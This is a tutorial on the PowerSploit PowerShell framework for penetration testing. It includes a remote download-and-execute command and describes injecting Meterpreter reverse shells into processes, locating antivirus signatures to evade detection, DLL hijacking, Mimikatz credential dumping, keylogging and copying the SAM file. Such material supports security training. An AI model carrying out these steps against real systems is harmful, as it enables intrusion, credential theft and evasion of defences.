To follow along with the article please download the latest version of PowerSploit available here: https://github.com/PowerShellMafia/PowerSploit If you have GIT, then you can simply run the following command to get all files from the github repository: [plain] git clone https://github.com/mattifestation/PowerSploit.git [/plain]
To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions. Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it. For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python: [plain] python -m SimpleHTTPServer [/plain]
Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/
PowerSploit has categorized all the scripts in a pretty clear and organized manner: In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration). Install and run a PowerShell script: [plain] IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”) [/plain] This command when run in PowerShell will install that PowerShell for the current process of PowerShell only.
Invoke-Shellcode
This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk. We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using: Run the above command in a PowerShell window to install “Invoke-Shellcode” script.
To get some information about the module type: Get-Help Invoke-Shellcode
Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:
Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell.
Please note that at the time of writing this article, only two Metasploit payloads are supported:
windows/meterpreter/reverse_http windows/meterpreter/reverse_https
If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process.
Inject in an existing process
Get Process ID (PID) of a process using “Get-Process”.
Note that the “Id” field is the Process ID (PID) of the corresponding process name. Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload.
After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:
Inject in a new process
Create a new hidden process and inject the payload into it:
And we got a Meterpreter shell on the attacking machine:
Invoke-DllInjection
This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk. We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:
Generate the Metasploit Meterpreter DLL and download it on the server: Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice. Create a process in hidden mode and inject the DLL into it.
We received a successful Meterpreter shell on the attacking machine:
Find-AVSignature
This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature. We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:
Running “Find-AVSignature” on a Meterpreter Windows executable:
The installed antivirus detected malicious files and we can see bytes with the AV signature:
Now we can see the bytes of “msf.exe” containing AV signatures.
Get-DllLoadPath
This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation. We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using:
Find where “Acrobat.exe” loads “shell32.dll” DLL from:
Invoke-Portscan
This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all. We can easily install the Recon PowerShell script “Invoke-Portscan” using:
Run a port scan for a list of hosts and ports:
There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options. It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively.
Invoke-ReverseDnsLookup
This cmdlet is used to find the DNS PTR record for corresponding IP address(es). We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:
Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch:
Unfortunately, it does not support comma separated values or file input of ranges like 173.194.117.1-50. It accepts only single IP or CIDR format for IP range.
Get-HttpStatus
This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server. We can easily install the Recon PowerShell script “Get-HttpStatus” using:
Execute this cmdlet using the following command (the dictionary file is that of DirBuster):
If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:
If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch.
It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too.
Get-Strings
This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility. We can easily install the Reverse Engineering PowerShell script “Get-Strings” using:
Get-Strings -Path <file_name_with_path>
It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now.
Invoke-Mimikatz
This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain. It is one of the most useful PowerSploit tools in a penetration testing engagement. We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:
Dump credentials using: Invoke-Mimikatz -DumpCreds
You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….)
Get-Keystrokes
This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location. We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:
This cmdlet can be executed using the following command: Key log is stored in: c:usersmasterdesktopkeylogger.txt
This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp. Invoke-NinjaCopy This cmdlet is used to copy protected files which cannot be copied when the operating system is running. We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:
Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file:
When you try to perform the same operation using the “copy” command, the file cannot be copied:
